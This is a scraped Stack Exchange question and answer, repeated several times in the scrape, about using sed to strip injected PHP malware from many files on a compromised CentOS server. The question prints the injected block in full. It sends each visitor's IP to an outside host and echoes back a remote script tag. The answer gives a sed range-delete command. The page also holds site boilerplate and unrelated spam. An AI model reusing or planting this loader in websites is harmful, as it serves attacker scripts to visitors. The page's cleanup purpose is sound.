How do I use the SED command to remove injected code from multiple files?

The name of the pictureThe name of the pictureThe name of the pictureClash Royale CLAN TAG#URR8PPP












1















One of the domains on my Centos 6.5 (64 bit) server has been compromised. Having run a detection script on the public_html folder I have identified all the files with this code injection.



I understand the SED command will help me rid the files of the code but I've never used the command before. I need some advice on what syntax to use. Please see the code example below that I want to remove (same code in every infected file):



 <?php
#7968e7#
if (empty($ywf))
error_reporting(0);
@ini_set('display_errors', 0);
if (!function_exists('__url_get_contents'))
function __url_get_contents($remote_url, $timeout)

if (function_exists('curl_exec'))
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
$_url_get_contents_data = curl_exec($ch);
curl_close($ch);
elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen'))
$ctx = @stream_context_create(array('http' =>
array(
'timeout' => $timeout,
)
));
$_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
elseif (function_exists('fopen') && function_exists('stream_get_contents'))
$handle = @fopen($remote_url, "r");
$_url_get_contents_data = @stream_get_contents($handle);
else
$_url_get_contents_data = __file_get_url_contents($remote_url);

return $_url_get_contents_data;


if (!function_exists('__file_get_url_contents'))
function __file_get_url_contents($remote_url)
$len_written != strlen($request))
// Error sending request
return FALSE;

$response = "";
while (!@feof($socket) &&
($buf = @fread($socket, 4096)) !== FALSE)
$response .= $buf;

if ($buf === FALSE)
// Error reading response
return FALSE;

$end_of_header = strpos($response, "rnrn");
return substr($response, $end_of_header + 4);



if (empty($__var_to_echo) && empty($remote_domain))
$_ip = $_SERVER['REMOTE_ADDR'];
$ywf = "http://www.sentinelproducts.com/message/FVkWXrCj.php";
$ywf = __url_get_contents($ywf."?a=$_ip", 1);
if (strpos($ywf, 'http://') === 0)
$__var_to_echo = '<script type="text/javascript" src="' . $ywf . '?id=108212681"></script>';
echo $__var_to_echo;



#/7968e7#
?>
<?php

?>


It is quite a large block of code so I'm wondering how I can go about removing it from the many infected files. There are javascript files infected with code as well but if I can get a grasp of how to rid the .php files of the code above then I can modify the command to clean the javascript files.










share|improve this question



















  • 3





    Please see also serverfault.com/questions/218005/…

    – derobert
    May 2 '14 at 16:17











  • It's probably a good idea to consider reinstalling the whole server. When the server has been compromised, you can't know what harmful software might be running on it..

    – daniel kullmann
    May 5 '14 at 13:35















1















One of the domains on my Centos 6.5 (64 bit) server has been compromised. Having run a detection script on the public_html folder I have identified all the files with this code injection.



I understand the SED command will help me rid the files of the code but I've never used the command before. I need some advice on what syntax to use. Please see the code example below that I want to remove (same code in every infected file):



 <?php
#7968e7#
if (empty($ywf))
error_reporting(0);
@ini_set('display_errors', 0);
if (!function_exists('__url_get_contents'))
function __url_get_contents($remote_url, $timeout)

if (function_exists('curl_exec'))
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
$_url_get_contents_data = curl_exec($ch);
curl_close($ch);
elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen'))
$ctx = @stream_context_create(array('http' =>
array(
'timeout' => $timeout,
)
));
$_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
elseif (function_exists('fopen') && function_exists('stream_get_contents'))
$handle = @fopen($remote_url, "r");
$_url_get_contents_data = @stream_get_contents($handle);
else
$_url_get_contents_data = __file_get_url_contents($remote_url);

return $_url_get_contents_data;


if (!function_exists('__file_get_url_contents'))
function __file_get_url_contents($remote_url)
$len_written != strlen($request))
// Error sending request
return FALSE;

$response = "";
while (!@feof($socket) &&
($buf = @fread($socket, 4096)) !== FALSE)
$response .= $buf;

if ($buf === FALSE)
// Error reading response
return FALSE;

$end_of_header = strpos($response, "rnrn");
return substr($response, $end_of_header + 4);



if (empty($__var_to_echo) && empty($remote_domain))
$_ip = $_SERVER['REMOTE_ADDR'];
$ywf = "http://www.sentinelproducts.com/message/FVkWXrCj.php";
$ywf = __url_get_contents($ywf."?a=$_ip", 1);
if (strpos($ywf, 'http://') === 0)
$__var_to_echo = '<script type="text/javascript" src="' . $ywf . '?id=108212681"></script>';
echo $__var_to_echo;



#/7968e7#
?>
<?php

?>


It is quite a large block of code so I'm wondering how I can go about removing it from the many infected files. There are javascript files infected with code as well but if I can get a grasp of how to rid the .php files of the code above then I can modify the command to clean the javascript files.










share|improve this question



















  • 3





    Please see also serverfault.com/questions/218005/…

    – derobert
    May 2 '14 at 16:17











  • It's probably a good idea to consider reinstalling the whole server. When the server has been compromised, you can't know what harmful software might be running on it..

    – daniel kullmann
    May 5 '14 at 13:35













1












1








1








One of the domains on my Centos 6.5 (64 bit) server has been compromised. Having run a detection script on the public_html folder I have identified all the files with this code injection.



I understand the SED command will help me rid the files of the code but I've never used the command before. I need some advice on what syntax to use. Please see the code example below that I want to remove (same code in every infected file):



 <?php
#7968e7#
if (empty($ywf))
error_reporting(0);
@ini_set('display_errors', 0);
if (!function_exists('__url_get_contents'))
function __url_get_contents($remote_url, $timeout)

if (function_exists('curl_exec'))
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
$_url_get_contents_data = curl_exec($ch);
curl_close($ch);
elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen'))
$ctx = @stream_context_create(array('http' =>
array(
'timeout' => $timeout,
)
));
$_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
elseif (function_exists('fopen') && function_exists('stream_get_contents'))
$handle = @fopen($remote_url, "r");
$_url_get_contents_data = @stream_get_contents($handle);
else
$_url_get_contents_data = __file_get_url_contents($remote_url);

return $_url_get_contents_data;


if (!function_exists('__file_get_url_contents'))
function __file_get_url_contents($remote_url)
$len_written != strlen($request))
// Error sending request
return FALSE;

$response = "";
while (!@feof($socket) &&
($buf = @fread($socket, 4096)) !== FALSE)
$response .= $buf;

if ($buf === FALSE)
// Error reading response
return FALSE;

$end_of_header = strpos($response, "rnrn");
return substr($response, $end_of_header + 4);



if (empty($__var_to_echo) && empty($remote_domain))
$_ip = $_SERVER['REMOTE_ADDR'];
$ywf = "http://www.sentinelproducts.com/message/FVkWXrCj.php";
$ywf = __url_get_contents($ywf."?a=$_ip", 1);
if (strpos($ywf, 'http://') === 0)
$__var_to_echo = '<script type="text/javascript" src="' . $ywf . '?id=108212681"></script>';
echo $__var_to_echo;



#/7968e7#
?>
<?php

?>


It is quite a large block of code so I'm wondering how I can go about removing it from the many infected files. There are javascript files infected with code as well but if I can get a grasp of how to rid the .php files of the code above then I can modify the command to clean the javascript files.










share|improve this question
















One of the domains on my Centos 6.5 (64 bit) server has been compromised. Having run a detection script on the public_html folder I have identified all the files with this code injection.



I understand the SED command will help me rid the files of the code but I've never used the command before. I need some advice on what syntax to use. Please see the code example below that I want to remove (same code in every infected file):



 <?php
#7968e7#
if (empty($ywf))
error_reporting(0);
@ini_set('display_errors', 0);
if (!function_exists('__url_get_contents'))
function __url_get_contents($remote_url, $timeout)

if (function_exists('curl_exec'))
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
$_url_get_contents_data = curl_exec($ch);
curl_close($ch);
elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen'))
$ctx = @stream_context_create(array('http' =>
array(
'timeout' => $timeout,
)
));
$_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
elseif (function_exists('fopen') && function_exists('stream_get_contents'))
$handle = @fopen($remote_url, "r");
$_url_get_contents_data = @stream_get_contents($handle);
else
$_url_get_contents_data = __file_get_url_contents($remote_url);

return $_url_get_contents_data;


if (!function_exists('__file_get_url_contents'))
function __file_get_url_contents($remote_url)
$len_written != strlen($request))
// Error sending request
return FALSE;

$response = "";
while (!@feof($socket) &&
($buf = @fread($socket, 4096)) !== FALSE)
$response .= $buf;

if ($buf === FALSE)
// Error reading response
return FALSE;

$end_of_header = strpos($response, "rnrn");
return substr($response, $end_of_header + 4);



if (empty($__var_to_echo) && empty($remote_domain))
$_ip = $_SERVER['REMOTE_ADDR'];
$ywf = "http://www.sentinelproducts.com/message/FVkWXrCj.php";
$ywf = __url_get_contents($ywf."?a=$_ip", 1);
if (strpos($ywf, 'http://') === 0)
$__var_to_echo = '<script type="text/javascript" src="' . $ywf . '?id=108212681"></script>';
echo $__var_to_echo;



#/7968e7#
?>
<?php

?>


It is quite a large block of code so I'm wondering how I can go about removing it from the many infected files. There are javascript files infected with code as well but if I can get a grasp of how to rid the .php files of the code above then I can modify the command to clean the javascript files.







sed






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited May 2 '14 at 16:12









Braiam

23.7k2077142




23.7k2077142










asked May 2 '14 at 15:52









user3596738user3596738

62




62







  • 3





    Please see also serverfault.com/questions/218005/…

    – derobert
    May 2 '14 at 16:17











  • It's probably a good idea to consider reinstalling the whole server. When the server has been compromised, you can't know what harmful software might be running on it..

    – daniel kullmann
    May 5 '14 at 13:35












  • 3





    Please see also serverfault.com/questions/218005/…

    – derobert
    May 2 '14 at 16:17











  • It's probably a good idea to consider reinstalling the whole server. When the server has been compromised, you can't know what harmful software might be running on it..

    – daniel kullmann
    May 5 '14 at 13:35







3




3





Please see also serverfault.com/questions/218005/…

– derobert
May 2 '14 at 16:17





Please see also serverfault.com/questions/218005/…

– derobert
May 2 '14 at 16:17













It's probably a good idea to consider reinstalling the whole server. When the server has been compromised, you can't know what harmful software might be running on it..

– daniel kullmann
May 5 '14 at 13:35





It's probably a good idea to consider reinstalling the whole server. When the server has been compromised, you can't know what harmful software might be running on it..

– daniel kullmann
May 5 '14 at 13:35










1 Answer
1






active

oldest

votes


















0














First do a backup.



This will remove the lines between the tags #7968e7# and #/7968e7# the original file will be kept with .bkp extension but it's better if you have a backup.



 sed -i.bkp '/#7968e7#/,/#/7968e7#/ d' filename 


It will leaves empty php blocks.



<?php
?>
<?php

?>





share|improve this answer

























  • Thanks. My bad, but the #7968e7# and #/7968e7# code changes in each file. Also if you know a way to do a recursive search and delete for a given string in multiple files, that would be great. I'd love to vote up your answer but I need more rep first :)

    – user3596738
    May 2 '14 at 20:13











Your Answer








StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "106"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);

else
createEditor();

);

function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);



);













draft saved

draft discarded


















StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f127596%2fhow-do-i-use-the-sed-command-to-remove-injected-code-from-multiple-files%23new-answer', 'question_page');

);

Post as a guest















Required, but never shown

























1 Answer
1






active

oldest

votes








1 Answer
1






active

oldest

votes









active

oldest

votes






active

oldest

votes









0














First do a backup.



This will remove the lines between the tags #7968e7# and #/7968e7# the original file will be kept with .bkp extension but it's better if you have a backup.



 sed -i.bkp '/#7968e7#/,/#/7968e7#/ d' filename 


It will leaves empty php blocks.



<?php
?>
<?php

?>





share|improve this answer

























  • Thanks. My bad, but the #7968e7# and #/7968e7# code changes in each file. Also if you know a way to do a recursive search and delete for a given string in multiple files, that would be great. I'd love to vote up your answer but I need more rep first :)

    – user3596738
    May 2 '14 at 20:13
















0














First do a backup.



This will remove the lines between the tags #7968e7# and #/7968e7# the original file will be kept with .bkp extension but it's better if you have a backup.



 sed -i.bkp '/#7968e7#/,/#/7968e7#/ d' filename 


It will leaves empty php blocks.



<?php
?>
<?php

?>





share|improve this answer

























  • Thanks. My bad, but the #7968e7# and #/7968e7# code changes in each file. Also if you know a way to do a recursive search and delete for a given string in multiple files, that would be great. I'd love to vote up your answer but I need more rep first :)

    – user3596738
    May 2 '14 at 20:13














0












0








0







First do a backup.



This will remove the lines between the tags #7968e7# and #/7968e7# the original file will be kept with .bkp extension but it's better if you have a backup.



 sed -i.bkp '/#7968e7#/,/#/7968e7#/ d' filename 


It will leaves empty php blocks.



<?php
?>
<?php

?>





share|improve this answer















First do a backup.



This will remove the lines between the tags #7968e7# and #/7968e7# the original file will be kept with .bkp extension but it's better if you have a backup.



 sed -i.bkp '/#7968e7#/,/#/7968e7#/ d' filename 


It will leaves empty php blocks.



<?php
?>
<?php

?>






share|improve this answer














share|improve this answer



share|improve this answer








edited May 2 '14 at 22:12

























answered May 2 '14 at 16:07









EmmanuelEmmanuel

3,07911120




3,07911120












  • Thanks. My bad, but the #7968e7# and #/7968e7# code changes in each file. Also if you know a way to do a recursive search and delete for a given string in multiple files, that would be great. I'd love to vote up your answer but I need more rep first :)

    – user3596738
    May 2 '14 at 20:13


















  • Thanks. My bad, but the #7968e7# and #/7968e7# code changes in each file. Also if you know a way to do a recursive search and delete for a given string in multiple files, that would be great. I'd love to vote up your answer but I need more rep first :)

    – user3596738
    May 2 '14 at 20:13

















Thanks. My bad, but the #7968e7# and #/7968e7# code changes in each file. Also if you know a way to do a recursive search and delete for a given string in multiple files, that would be great. I'd love to vote up your answer but I need more rep first :)

– user3596738
May 2 '14 at 20:13






Thanks. My bad, but the #7968e7# and #/7968e7# code changes in each file. Also if you know a way to do a recursive search and delete for a given string in multiple files, that would be great. I'd love to vote up your answer but I need more rep first :)

– user3596738
May 2 '14 at 20:13


















draft saved

draft discarded
















































Thanks for contributing an answer to Unix & Linux Stack Exchange!


  • Please be sure to answer the question. Provide details and share your research!

But avoid


  • Asking for help, clarification, or responding to other answers.

  • Making statements based on opinion; back them up with references or personal experience.

To learn more, see our tips on writing great answers.




draft saved


draft discarded














StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f127596%2fhow-do-i-use-the-sed-command-to-remove-injected-code-from-multiple-files%23new-answer', 'question_page');

);

Post as a guest















Required, but never shown





















































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown

































Required, but never shown














Required, but never shown












Required, but never shown







Required, but never shown






Popular posts from this blog

How to check contact read email or not when send email to Individual?

Displaying single band from multi-band raster using QGIS

How many registers does an x86_64 CPU actually have?